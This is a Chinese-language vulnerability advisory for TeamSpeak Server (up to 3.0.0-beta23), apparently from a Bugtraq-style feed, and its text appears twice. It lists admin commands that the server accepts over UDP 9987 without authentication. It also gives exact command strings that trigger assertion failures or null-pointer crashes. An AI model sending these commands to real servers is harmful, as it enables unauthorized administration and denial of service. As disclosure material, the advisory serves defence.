BUGTRAQ ID: 40918 TeamSpeak是一种专门为网络游戏玩家设计的IP语音通信系统。 TeamSpeak服务器在执行通过UDP 9987端口所接收到的受限制命令时没有要求认证,用户可以非授权执行各种管理命令。以下是部分有漏洞命令的列表: banclient bandel channeladdperm/channeldelperm channelclientaddperm/channelclientdelperm channeldelete channeledit channelmove clientaddperm/clientdelperm clientdbdelete clientget* clientkick clientmove clientpoke messageadd sendtextmessage serveredit servergroupadd setclientchannelgroup tokenadd/tokendel 此外通过UDP 9987端口发送以下命令还可以触发Assertion错误: banlist Assertion "invokerClientID != 0" failed at server\serverlib\virtualserver.cpp:7442; complainlist Assertion "client != 0" failed at server\serverlib\permission_manager.cpp:167; servernotifyunregister not implemented serverrequestconnectioninfo Assertion "client != 0" failed at server\serverlib\permission_manager.cpp:167; setconnectioninfo Assertion "clID != 0" failed at common\packethandler.cpp:367; servernotifyregister event=server not implemented 发送以下命令可触发空指针引用:...
BUGTRAQ ID: 40918 TeamSpeak是一种专门为网络游戏玩家设计的IP语音通信系统。 TeamSpeak服务器在执行通过UDP 9987端口所接收到的受限制命令时没有要求认证,用户可以非授权执行各种管理命令。以下是部分有漏洞命令的列表: banclient bandel channeladdperm/channeldelperm channelclientaddperm/channelclientdelperm channeldelete channeledit channelmove clientaddperm/clientdelperm clientdbdelete clientget* clientkick clientmove clientpoke messageadd sendtextmessage serveredit servergroupadd setclientchannelgroup tokenadd/tokendel 此外通过UDP 9987端口发送以下命令还可以触发Assertion错误: banlist Assertion "invokerClientID != 0" failed at server\serverlib\virtualserver.cpp:7442; complainlist Assertion "client != 0" failed at server\serverlib\permission_manager.cpp:167; servernotifyunregister not implemented serverrequestconnectioninfo Assertion "client != 0" failed at server\serverlib\permission_manager.cpp:167; setconnectioninfo Assertion "clID != 0" failed at common\packethandler.cpp:367; servernotifyregister event=server not implemented 发送以下命令可触发空指针引用: bandelall channelcreate channel_name=name channelsubscribe cid=1 channelsubscribeall banadd ip=1.2.3.4 clientedit clid=1 client_description=none messageupdateflag msgid=1 flag=1 complainadd tcldbid=1 message=none complaindelall tcldbid=1 ftinitupload clientftfid=1 name=file.txt cid=5 cpw= size=9999 overwrite=1 resume=0 ftgetfilelist cid=1 cpw= path=\/ ftdeletefile cid=1 cpw= name=\/ ftcreatedir cid=1 cpw= dirname=\/ ftrenamefile cid=1 cpw= tcid=1 tcpw=secret oldname=\/ newname=\/ ftinitdownload clientftfid=1 name=\/ cid=1 cpw= seekpos=0 这都会导致服务器终止或崩溃。 TeamSpeak Server <= 3.0.0-beta23 厂商补丁: TeamSpeak Systems GmbH ---------------------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.teamspeak.com
